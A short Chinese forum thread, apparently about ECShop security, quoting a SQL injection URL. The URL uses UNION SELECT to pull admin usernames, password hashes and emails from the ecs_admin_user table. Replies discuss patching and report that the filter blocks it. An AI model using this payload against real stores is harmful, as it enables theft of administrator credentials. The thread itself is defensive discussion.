亲身经历,告知你打开用户登陆时需要验证码的重要性。

2016-07-07 15:45 来源:www.chinab4c.com 作者:ecshop专家

user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*”


这个是SQL注入,,,

关注官方给出补丁,

楼主有没有主动联系官方管理员了??

回答:
收藏此帖,关注中...

order_sn是有过滤的,我在本地测试用你提供的帖子里的方法是得不到管理员帐号的。

order_sn是有过滤的,我在本地测试用你提供的帖子里的方法是得不到管理员帐号的。
robb 发表于 2009-5-7 10:50


这个是去年的帖子了,里面提到的方法应该是已经被入侵者改进了。坛子里的ludgefan 兄弟给了我这个建议,不知道对你们有没有帮助 http://bbs.ecshop.com/viewthread.php?tid=82825&page=2&fromuid=24374#pid341433